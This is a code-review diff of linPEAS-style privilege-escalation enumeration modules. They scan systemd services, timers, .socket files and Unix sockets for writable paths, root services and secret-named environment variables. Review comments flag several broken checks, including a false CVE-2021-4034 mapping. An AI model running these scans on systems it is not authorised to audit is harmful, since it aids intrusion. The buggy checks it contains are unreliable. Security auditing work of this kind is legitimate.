relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null)
if [ "$relpath1" ] || [ "$relpath2" ]; then
if [ "$WRITABLESYSTEMDPATH" ]; then
echo "$s could be executing some relative path" | sed -${E} "s,.*,${SED_RED},";
else
echo "$s could be executing some relative path"
fi
fi
fi
done
if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi
echo ""
if ! [ "$SEARCH_IN_FOLDER" ]; then
#-- PSC) Timers
print_2title "System timers"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers"
(systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found
echo ""
fi
#-- PSC) .timer files
print_2title "Analyzing .timer files"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers"
printf "%s\n" "$PSTORAGE_TIMER" | while read t; do
if ! [ "$IAMROOT" ] && [ -w "$t" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
echo "$t" | sed -${E} "s,.*,${SED_RED},g"
fi
timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2)
printf "%s\n" "$timerbinpaths" | while read tb; do
if [ -w "$tb" ]; then
echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g"
fi
done
#relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`"
#for rp in "$relpath"; do
# echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g"
#done
done
echo ""
#-- PSC) .socket files
#TODO: .socket files in MACOS are folders
if ! [ "$IAMROOT" ]; then
print_2title "Analyzing .socket files"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets"
printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do
if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g"
fi
socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
printf "%s\n" "$socketsbinpaths" | while read sb; do
if [ -w "$sb" ]; then
echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g"
fi
done
socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
printf "%s\n" "$socketslistpaths" | while read sl; do
if [ -w "$sl" ]; then
echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g";
fi
done
done
echo ""
if ! [ "$SEARCH_IN_FOLDER" ]; then
print_2title "Unix Sockets Listening"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets"
# Search sockets using netstat and ss
unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1)
if ! [ "$unix_scks_list" ];then
unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+")
fi
if ! [ "$unix_scks_list" ];then
unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2)
fi
unix_scks_list3=$(lsof -U 2>/dev/null | awk '{print $9}' | grep "/")
fi
if ! [ "$SEARCH_IN_FOLDER" ]; then
# But also search socket files
unix_scks_list2=$(find / -type s 2>/dev/null)
else
unix_scks_list2=$(find "SEARCH_IN_FOLDER" -type s 2>/dev/null)
fi
# Detele repeated dockets and check permissions
(printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2" && printf "%s\n" "$unix_scks_list3") | sort | uniq | while read l; do
perms=""
if [ -r "$l" ]; then
perms="Read "
fi
if [ -w "$l" ];then
perms="${perms}Write"
fi
if [ "$EXTRA_CHECKS" ] && [ "$(command -v curl)" ]; then
CANNOT_CONNECT_TO_SOCKET="$(curl -v --unix-socket "$l" --max-time 1 http:/linpeas 2>&1 | grep -i 'Permission denied')"
if ! [ "$CANNOT_CONNECT_TO_SOCKET" ]; then
perms="${perms} - Can Connect"
else
perms="${perms} - Cannot Connect"
fi
fi
if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g";
else
echo "$l" | sed -${E} "s,$l,${SED_RED},g"
echo " └─(${RED}${perms}${NC})" | sed -${E} "s,Cannot Connect,${SED_GREEN},g"
# Try to contact the socket
socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null)
if [ $? -eq 0 ]; then
owner=$(ls -l "$s" | cut -d ' ' -f 3)
echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g"
echo "$socketcurl" | head -n 30
fi
fi
done
echo ""
fi
#-- PSC) Writable and weak policies in D-Bus config files
print_2title "D-Bus config files"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus"
if [ "$PSTORAGE_DBUS" ]; then
printf "%s\n" "$PSTORAGE_DBUS" | while read d; do
for f in $d/*; do
if ! [ "$IAMROOT" ] && [ -w "$f" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g"
fi
genpol=$(grep "<policy>" "$f" 2>/dev/null)
if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi
#if [ "`grep \"<policy user=\\\"$USER\\\">\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi
userpol=$(grep "<policy user=" "$f" 2>/dev/null | grep -v "root")
if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi
#for g in `groups`; do
# if [ "`grep \"<policy group=\\\"$g\\\">\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi
#done
grppol=$(grep "<policy group=" "$f" 2>/dev/null | grep -v "root")
if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi
#TODO: identify allows in context="default"
done
done
fi
echo ""
if ! [ "$SEARCH_IN_FOLDER" ]; then
print_2title "D-Bus Service Objects list"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus"
dbuslist=$(busctl list 2>/dev/null)
if [ "$dbuslist" ]; then
busctl list | while read line; do
echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},";
if ! echo "$line" | grep -qE "$dbuslistG"; then
srvc_object=$(echo $line | cut -d " " -f1)
srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ')
if [ "$srvc_object_info" ]; then
echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED},"
fi
fi
done
else echo_not_found "busctl"
fi
fi
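Review bot: two defects in the removed Unix-socket section should not travel into whichever new module replaces it: `unix_scks_list2=$(find "SEARCH_IN_FOLDER" -type s 2>/dev/null)` is missing the `$` and so searches a literal directory name, and the HTTP probe `curl --max-time 2 --unix-socket "$s" http:/index` plus the `ls -l "$s"` owner lookup use `$s` inside a loop whose variable is `$l`, so the probe never targets the socket just listed. Likewise the D-Bus group check prints `Possible weak user policy found` for `$grppol` where it should say group policy. Among the files shown in this compare only the services, systemd and `.socket` replacements are visible, so the cron, timer, D-Bus, Unix-socket-listening and macOS launchd checks removed here should be confirmed to exist in other new modules.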

View File

@ -0,0 +1,193 @@
# Title: Processes & Cron & Services & Timers - Services and Service Files
# ID: PR_Services
# Author: Carlos Polop
# Last Update: 2024-03-19
# Description: Services and service files analysis with privilege escalation vectors
# License: GNU GPL
# Version: 1.2
# Functions Used: echo_not_found, print_2title, print_info, print_3title
# Global Variables: $EXTRA_CHECKS, $SEARCH_IN_FOLDER, $IAMROOT, $WRITABLESYSTEMDPATH
# Initial Functions:
# Generated Global Variables: $service_unit, $service_path, $service_content, $finding, $findings, $service_file, $exec_path, $exec_paths, $service, $line, $target_file, $target_exec, $relpath1, $relpath2
# Fat linpeas: 0
# Small linpeas: 0
if ! [ "$SEARCH_IN_FOLDER" ]; then
print_2title "Services and Service Files"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#services"
# Function to check service content for privilege escalation vectors
check_service_content() {
local service="$1"
local findings=""
# Check if service runs with elevated privileges
if systemctl show "$service" -p User 2>/dev/null | grep -q "root"; then
findings="${findings}RUNS_AS_ROOT: Service runs as root\n"
fi
# Get the executable path and check it
local exec_path=$(systemctl show "$service" -p ExecStart 2>/dev/null | cut -d= -f2 | cut -d' ' -f1)
if [ -n "$exec_path" ]; then
if [ -w "$exec_path" ]; then
findings="${findings}WRITABLE_EXEC: Executable is writable: $exec_path\n"
fi
# Check for relative paths
#case "$exec_path" in
# /*) : ;; # Absolute path, do nothing
# *) findings="${findings}RELATIVE_PATH: Uses relative path: $exec_path\n" ;;
#esac
# Check for weak permissions
if [ -e "$exec_path" ] && [ "$(stat -c %a "$exec_path" 2>/dev/null)" = "777" ]; then
findings="${findings}WEAK_PERMS: Executable has 777 permissions\n"
fi
fi
# Check for unsafe configurations
if systemctl show "$service" -p ExecStart 2>/dev/null | grep -qE '(chmod|chown|mount|sudo|su)'; then
findings="${findings}UNSAFE_CMD: Uses potentially dangerous commands\n"
fi
# Check for environment variables with sensitive data
if systemctl show "$service" -p Environment 2>/dev/null | grep -qE '(PASS|SECRET|KEY|TOKEN|CRED)'; then
findings="${findings}SENSITIVE_ENV: Contains sensitive environment variables\n"
fi
# Check for capabilities
if systemctl show "$service" -p CapabilityBoundingSet 2>/dev/null | grep -qE '(CAP_SYS_ADMIN|CAP_DAC_OVERRIDE|CAP_DAC_READ_SEARCH)'; then
findings="${findings}DANGEROUS_CAPS: Has dangerous capabilities\n"
fi
# If any findings, print them
if [ -n "$findings" ]; then
echo " Potential issue in service: $service"
echo "$findings" | while read -r finding; do
[ -n "$finding" ] && echo " └─ $finding"
done
fi
}
# Function to check service file for privilege escalation vectors
check_service_file() {
local service_file="$1"
local findings=""
# Check if service file is writable (following symlinks)
if [ -L "$service_file" ]; then
# If it's a symlink, check the target file
local target_file=$(readlink -f "$service_file")
if ! [ "$IAMROOT" ] && [ -w "$target_file" ] && [ -f "$target_file" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
findings="${findings}WRITABLE_FILE: Service target file is writable: $target_file\n"
fi
elif ! [ "$IAMROOT" ] && [ -w "$service_file" ] && [ -f "$service_file" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
findings="${findings}WRITABLE_FILE: Service file is writable\n"
fi
# Check for weak permissions (following symlinks)
if [ "$(stat -L -c %a "$service_file" 2>/dev/null)" = "777" ]; then
findings="${findings}WEAK_PERMS: Service file has 777 permissions\n"
fi
# Check for relative paths in Exec directives - Original logic
local relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$service_file" 2>/dev/null | grep -Iv "=/")
local relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$service_file" 2>/dev/null)
if [ "$relpath1" ] || [ "$relpath2" ]; then
if [ "$WRITABLESYSTEMDPATH" ]; then
findings="${findings}RELATIVE_PATH: Could be executing some relative path (systemd path is writable)\n"
else
findings="${findings}RELATIVE_PATH: Could be executing some relative path\n"
fi
fi
# Check for writable executables (following symlinks)
local exec_paths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$service_file" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
printf "%s\n" "$exec_paths" | while read -r exec_path; do
if [ -n "$exec_path" ]; then
if [ -L "$exec_path" ]; then
local target_exec=$(readlink -f "$exec_path")
if [ -w "$target_exec" ]; then
findings="${findings}WRITABLE_EXEC: Executable target is writable: $target_exec\n"
fi
elif [ -w "$exec_path" ]; then
findings="${findings}WRITABLE_EXEC: Executable is writable: $exec_path\n"
fi
fi
done
# If any findings, print them
if [ -n "$findings" ]; then
echo " Potential issue in service file: $service_file"
echo "$findings" | while read -r finding; do
[ -n "$finding" ] && echo " └─ $finding"
done
fi
}
# List all services and check for privilege escalation vectors
echo ""
print_3title "Active services:"
systemctl list-units --type=service --state=active 2>/dev/null | grep -v "UNIT" | while read -r line; do
service_unit=$(echo "$line" | awk '{print $1}')
if [ -n "$service_unit" ]; then
# Print the service line with highlighting
echo "$line" | sed -${E} "s,$service_unit,${SED_GREEN},"
# Get service file path
service_path=$(systemctl show "$service_unit" -p FragmentPath 2>/dev/null | cut -d= -f2)
if [ -n "$service_path" ]; then
check_service_file "$service_path"
fi
# Check service content for privilege escalation vectors
check_service_content "$service_unit"
fi
done || echo_not_found
# Check for disabled but available services
echo ""
print_3title "Disabled services:"
systemctl list-unit-files --type=service --state=disabled 2>/dev/null | grep -v "UNIT FILE" | while read -r line; do
service_unit=$(echo "$line" | awk '{print $1}')
if [ -n "$service_unit" ]; then
# Print the service line with highlighting
echo "$line" | sed -${E} "s,$service_unit,${SED_GREEN},"
# Get service file path
service_path=$(systemctl show "$service_unit" -p FragmentPath 2>/dev/null | cut -d= -f2)
if [ -n "$service_path" ]; then
check_service_file "$service_path"
fi
# Check service content for privilege escalation vectors
check_service_content "$service_unit"
fi
done || echo_not_found
# Check service files from PSTORAGE_SYSTEMD
if [ -n "$PSTORAGE_SYSTEMD" ]; then
echo ""
print_3title "Additional service files:"
printf "%s\n" "$PSTORAGE_SYSTEMD" | while read -r service_file; do
if [ -n "$service_file" ] && [ -e "$service_file" ]; then
check_service_file "$service_file"
fi
done
fi
# Check for outdated services if EXTRA_CHECKS is enabled
if [ "$EXTRA_CHECKS" ]; then
echo ""
print_3title "Service versions and status:"
(service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl"
fi
# Check systemd path writability
if [ ! "$WRITABLESYSTEMDPATH" ]; then
echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"
else
echo "You can write on systemd PATH" | sed -${E} "s,.*,${SED_RED},"
echo "If a relative path is used, it's possible to abuse it."
fi
echo ""
fi
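Review bot: in `check_service_file`, the `printf "%s\n" "$exec_paths" | while read -r exec_path; do ... done` loop runs in a subshell, so the `WRITABLE_EXEC` findings it appends to `findings` are discarded when the loop ends and never reach the `if [ -n "$findings" ]` block. Rewrite the loop without a pipe (for example `for exec_path in $exec_paths; do`, which is safe here because the extracting regex allows no whitespace in paths, or a here-document `done <<EOF`), or echo the finding directly inside the loop. Two smaller points: `systemctl show "$service" -p User | grep -q "root"` never fires for the common case, because a unit with no `User=` directive prints an empty `User=` and runs as root, so treat an empty value as root as well; and the `relpath1` pattern `(?:[^/]|...)` is a PCRE non-capturing group that `grep -E` rejects as an invalid expression, so with `2>/dev/null` that check is silently always empty (inherited from the removed block, as the `Original logic` comment notes). Also, `systemctl list-units` and `list-unit-files` print a legend after the table (`LOAD = ...`, `N loaded units listed`); without `--no-legend --plain`, those words are fed to `systemctl show` as unit names.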

View File

@ -0,0 +1,156 @@
# Title: System Information - Systemd
# ID: SY_Systemd
# Author: Carlos Polop
# Last Update: 2024-03-19
# Description: Check for systemd vulnerabilities and misconfigurations that could lead to privilege escalation:
# - Systemd version vulnerabilities (CVE-2021-4034, CVE-2021-33910, etc.)
# - Services running as root that could be exploited
# - Services with dangerous capabilities that could be abused
# - Services with writable paths that could be used to inject malicious code
# - Exploitation methods:
# * Version exploits: Use known exploits for vulnerable systemd versions
# * Root services: Abuse services running as root to execute commands
# * Capabilities: Abuse services with dangerous capabilities (CAP_SYS_ADMIN, etc.)
# * Writable paths: Replace executables in writable paths to get code execution
# License: GNU GPL
# Version: 1.1
# Functions Used: print_2title, print_list, echo_not_found
# Global Variables: $SEARCH_IN_FOLDER, $Wfolders, $SED_RED, $SED_RED_YELLOW, $NC
# Initial Functions:
# Generated Global Variables: $WRITABLESYSTEMDPATH, $line, $service, $file, $version, $user, $caps, $path, $path_line, $service_file, $exec_line, $cmd
# Fat linpeas: 0
# Small linpeas: 1
if ! [ "$SEARCH_IN_FOLDER" ]; then
print_2title "Systemd Information"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths"
# Function to check if systemctl is available
check_systemctl() {
if ! command -v systemctl >/dev/null 2>&1; then
echo_not_found "systemctl"
return 1
fi
return 0
}
# Function to get service file path
get_service_file() {
local service="$1"
local file=""
for path in "/etc/systemd/system/$service" "/lib/systemd/system/$service"; do
if [ -f "$path" ]; then
file="$path"
break
fi
done
echo "$file"
}
# Function to check dangerous capabilities
check_dangerous_caps() {
local caps="$1"
echo "$caps" | grep -qE '(CAP_SYS_ADMIN|CAP_DAC_OVERRIDE|CAP_DAC_READ_SEARCH|CAP_SETUID|CAP_SETGID|CAP_NET_ADMIN)'
return $?
}
# Check systemd version and known vulnerabilities
print_list "Systemd version and vulnerabilities? .............. "$NC
if check_systemctl; then
version=$(systemctl --version | head -n 1 | grep -oE '([0-9]+(\.[0-9]+)+)')
if [ -n "$version" ]; then
echo "$version" | sed -${E} "s,([0-9]+(\.[0-9]+)+),${SED_RED},g"
# Check for known vulnerable versions
case "$version" in
"2.3"[0-4]|"2.3"[0-4]"."*)
echo " └─ Vulnerable to CVE-2021-4034 (Polkit)" | sed -${E} "s,.*,${SED_RED},g"
;;
"2.4"[0-9]|"2.4"[0-9]"."*)
echo " └─ Vulnerable to CVE-2021-33910 (systemd-tmpfiles)" | sed -${E} "s,.*,${SED_RED},g"
;;
esac
fi
fi
# Check for systemd services running as root
print_list "Services running as root? ..... "$NC
if check_systemctl; then
systemctl list-units --type=service --state=running 2>/dev/null |
grep -E "root|0:0" |
while read -r line; do
service=$(echo "$line" | awk '{print $1}')
user=$(systemctl show "$service" -p User 2>/dev/null | cut -d= -f2)
echo "$service (User: $user)" | sed -${E} "s,root|0:0,${SED_RED},g"
done
echo ""
else
echo ""
fi
# Check for systemd services with dangerous capabilities
print_list "Running services with dangerous capabilities? ... "$NC
if check_systemctl; then
systemctl list-units --type=service --state=running 2>/dev/null |
grep -E "\.service" |
while read -r line; do
service=$(echo "$line" | awk '{print $1}')
caps=$(systemctl show "$service" -p CapabilityBoundingSet 2>/dev/null | cut -d= -f2)
if [ -n "$caps" ] && check_dangerous_caps "$caps"; then
echo "$service: $caps" | sed -${E} "s,.*,${SED_RED},g"
fi
done
echo ""
else
echo ""
fi
# Check for systemd services with writable paths
print_list "Services with writable paths? . "$NC
if check_systemctl; then
systemctl list-units --type=service --state=running 2>/dev/null |
grep -E "\.service" |
while read -r line; do
service=$(echo "$line" | awk '{print $1}')
service_file=$(get_service_file "$service")
if [ -n "$service_file" ]; then
# Check ExecStart paths
grep -E "ExecStart|ExecStartPre|ExecStartPost" "$service_file" 2>/dev/null |
while read -r exec_line; do
# Extract the first word after ExecStart* as the command
cmd=$(echo "$exec_line" | awk '{print $2}' | tr -d '"')
# Extract the rest as arguments
args=$(echo "$exec_line" | awk '{$1=$2=""; print $0}' | tr -d '"')
# Only check the command path, not arguments
if [ -n "$cmd" ] && [ -w "$cmd" ]; then
echo "$service: $cmd (from $exec_line)" | sed -${E} "s,.*,${SED_RED},g"
fi
# Check for relative paths only in the command, not arguments
if [ -n "$cmd" ] && [ "${cmd#/}" = "$cmd" ] && ! echo "$cmd" | grep -qE '^-|^--'; then
echo "$service: Uses relative path '$cmd' (from $exec_line)" | sed -${E} "s,.*,${SED_RED},g"
fi
done
fi
done
else
echo ""
fi
echo ""
print_2title "Systemd PATH"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths"
if check_systemctl; then
systemctl show-environment 2>/dev/null |
grep "PATH" |
while read -r path_line; do
echo "$path_line" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g"
# Store writable paths for later use
if echo "$path_line" | grep -qE "$Wfolders"; then
WRITABLESYSTEMDPATH="$path_line"
fi
done
fi
echo ""
fi
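Review bot: The version patterns in the `case "$version" in` block of the systemd version check never match real output: `"2.3"[0-4]` is the literal string `2.3` followed by one digit, but `systemctl --version` reports versions such as `245` or `249.11`, so neither branch can fire. If the intent is major versions 230 to 234 and 240 to 249, the patterns would need to be `23[0-4]|23[0-4].*` and `24[0-9]|24[0-9].*`, and the CVE ranges should be re-checked against the advisories before the labels are trusted. Independently, CVE-2021-4034 (PwnKit) is a bug in polkit's `pkexec`, not in systemd, so deriving it from the systemd version is a false finding regardless of the pattern. A smaller issue in the "Services running as root" block: `systemctl list-units` prints no user column, so `grep -E "root|0:0"` only matches unit descriptions that happen to contain "root", and an empty `User=` value from `systemctl show` means the service runs as root, so the check should treat an empty value as root rather than relying on the grep. The `args` variable in the writable-paths loop is assigned but never used.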

@ -0,0 +1,146 @@
# Title: Processes & Cron & Services & Timers - Socket Files Analysis
# ID: PR_Socket_files
# Author: Carlos Polop
# Last Update: 2024-03-19
# Description: Analyze .socket files for privilege escalation vectors:
# - Writable socket files
# - Socket files executing writable binaries
# - Socket files with writable listeners
# - Socket files with relative paths
# - Socket files with unsafe configurations
# License: GNU GPL
# Version: 1.2
# Functions Used: print_2title, print_info, print_list
# Global Variables: $IAMROOT, $SEARCH_IN_FOLDER, $SED_RED, $SED_RED_YELLOW, $NC
# Initial Functions:
# Generated Global Variables: $exec_path, $listen_path, $path, $exec_paths, $finding, $listen_paths, $socket_file, $findings, $target_file, $target_listen, $target_exec, $lpath
# Fat linpeas: 0
# Small linpeas: 0
if ! [ "$IAMROOT" ]; then
print_2title "Analyzing .socket files"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets"
# Function to check if path is relative
is_relative_path() {
local lpath="$1"
case "$lpath" in
/*) return 1 ;; # Absolute path
*) return 0 ;; # Relative path
esac
}
# Function to check socket file content
check_socket_file() {
local socket_file="$1"
local findings=""
# Check if socket file is writable (following symlinks)
if [ -L "$socket_file" ]; then
# If it's a symlink, check the target file
local target_file=$(readlink -f "$socket_file")
if ! [ "$IAMROOT" ] && [ -w "$target_file" ] && [ -f "$target_file" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
findings="${findings}WRITABLE_FILE: Socket target file is writable: $target_file\n"
fi
elif ! [ "$IAMROOT" ] && [ -w "$socket_file" ] && [ -f "$socket_file" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
findings="${findings}WRITABLE_FILE: Socket file is writable\n"
fi
# Check for weak permissions (following symlinks)
if [ "$(stat -L -c %a "$socket_file" 2>/dev/null)" = "777" ]; then
findings="${findings}WEAK_PERMS: Socket file has 777 permissions\n"
fi
# Check for executables (following symlinks)
local exec_paths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$socket_file" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
printf "%s\n" "$exec_paths" | while read -r exec_path; do
if [ -n "$exec_path" ]; then
# Check if executable is writable (following symlinks)
if [ -L "$exec_path" ]; then
local target_exec=$(readlink -f "$exec_path")
if [ -w "$target_exec" ]; then
findings="${findings}WRITABLE_EXEC: Executable target is writable: $target_exec\n"
fi
# Check for weak permissions on target
if [ -e "$target_exec" ] && [ "$(stat -L -c %a "$target_exec" 2>/dev/null)" = "777" ]; then
findings="${findings}WEAK_EXEC_PERMS: Executable target has 777 permissions: $target_exec\n"
fi
else
if [ -w "$exec_path" ]; then
findings="${findings}WRITABLE_EXEC: Executable is writable: $exec_path\n"
fi
# Check for weak permissions
if [ -e "$exec_path" ] && [ "$(stat -L -c %a "$exec_path" 2>/dev/null)" = "777" ]; then
findings="${findings}WEAK_EXEC_PERMS: Executable has 777 permissions: $exec_path\n"
fi
fi
# Check for relative paths
if is_relative_path "$exec_path"; then
findings="${findings}RELATIVE_PATH: Uses relative path: $exec_path\n"
fi
fi
done
# Check for listeners (following symlinks)
local listen_paths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$socket_file" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
printf "%s\n" "$listen_paths" | while read -r listen_path; do
if [ -n "$listen_path" ]; then
# Check if listener path is writable (following symlinks)
if [ -L "$listen_path" ]; then
local target_listen=$(readlink -f "$listen_path")
if [ -w "$target_listen" ]; then
findings="${findings}WRITABLE_LISTENER: Listener target path is writable: $target_listen\n"
fi
# Check for weak permissions on target
if [ -e "$target_listen" ] && [ "$(stat -L -c %a "$target_listen" 2>/dev/null)" = "777" ]; then
findings="${findings}WEAK_LISTENER_PERMS: Listener target path has 777 permissions: $target_listen\n"
fi
else
if [ -w "$listen_path" ]; then
findings="${findings}WRITABLE_LISTENER: Listener path is writable: $listen_path\n"
fi
# Check for weak permissions
if [ -e "$listen_path" ] && [ "$(stat -L -c %a "$listen_path" 2>/dev/null)" = "777" ]; then
findings="${findings}WEAK_LISTENER_PERMS: Listener path has 777 permissions: $listen_path\n"
fi
fi
# Check for relative paths
if is_relative_path "$listen_path"; then
findings="${findings}RELATIVE_LISTENER: Uses relative path: $listen_path\n"
fi
fi
done
# Check for unsafe configurations
if grep -qE '^(User|Group)=root' "$socket_file" 2>/dev/null; then
findings="${findings}ROOT_USER: Socket runs as root\n"
fi
if grep -qE '^(CapabilityBoundingSet).*CAP_SYS_ADMIN' "$socket_file" 2>/dev/null; then
findings="${findings}DANGEROUS_CAPS: Has dangerous capabilities\n"
fi
if grep -qE '^(BindIP|BindIPv6Only)=yes' "$socket_file" 2>/dev/null; then
findings="${findings}NETWORK_BIND: Can bind to network interfaces\n"
fi
# If any findings, print them
if [ -n "$findings" ]; then
echo "Potential privilege escalation in socket file: $socket_file"
echo "$findings" | while read -r finding; do
[ -n "$finding" ] && echo " └─ $finding" | sed -${E} "s,WRITABLE.*,${SED_RED},g" | sed -${E} "s,RELATIVE.*,${SED_RED_YELLOW},g"
done
fi
}
# Process each socket file
if [ -n "$PSTORAGE_SOCKET" ]; then
printf "%s\n" "$PSTORAGE_SOCKET" | while read -r socket_file; do
if [ -n "$socket_file" ] && [ -e "$socket_file" ]; then
check_socket_file "$socket_file"
fi
done
else
print_list "No socket files found" "$NC"
fi
echo ""
fi
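Review bot: Most of the findings collected in `check_socket_file` are silently dropped: `printf "%s\n" "$exec_paths" | while read -r exec_path; do` and the matching `listen_paths` loop run in a subshell because of the pipe, so every `findings="${findings}WRITABLE_EXEC: ..."`, `WRITABLE_LISTENER` and `RELATIVE_*` assignment inside them is lost when the loop ends, and only the WRITABLE_FILE, WEAK_PERMS, ROOT_USER, DANGEROUS_CAPS and NETWORK_BIND lines can ever reach the final `if [ -n "$findings" ]` block. Feed the loops from a here-document (`done <<EOF`) or a `for` over the variable, or print the lines from inside the loop. Two related details: the `grep -Eo '^(Exec).*?=[!@+-]*/...'` pattern requires a `/` right after the prefix characters, so `is_relative_path` can never receive a relative path from it and that branch is dead code; and `BindIPv6Only=` accepts `default`, `both` or `ipv6-only`, never `yes` (there is no `BindIP=` option in socket units), so the NETWORK_BIND check cannot match a valid unit. Finally, the findings are joined with a literal `\n` inside double quotes, which `echo` expands in dash but not in bash, so on bash the summary `while read -r finding` loop receives one long line; `printf '%b'` is the portable choice.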

@ -0,0 +1,151 @@
# Title: Processes & Cron & Services & Timers - Unix Sockets Analysis
# ID: PR_Unix_sockets_listening
# Author: Carlos Polop
# Last Update: 2024-03-19
# Description: Analyze Unix sockets for privilege escalation vectors:
# - Listening Unix sockets
# - Socket file permissions
# - Socket ownership
# - Socket connectivity
# - Socket protocol analysis
# License: GNU GPL
# Version: 1.1
# Functions Used: print_2title, print_info
# Global Variables: $EXTRA_CHECKS, $groupsB, $groupsVB, $IAMROOT, $idB, $knw_grps, $knw_usrs, $nosh_usrs, $SEARCH_IN_FOLDER, $sh_usrs, $USER, $SED_RED, $SED_GREEN, $NC, $RED
# Initial Functions:
# Generated Global Variables: $unix_scks_list, $unix_scks_list2, $perms, $owner, $owner_info, $response, $socket, $cmd, $mode, $group
# Fat linpeas: 0
# Small linpeas: 0
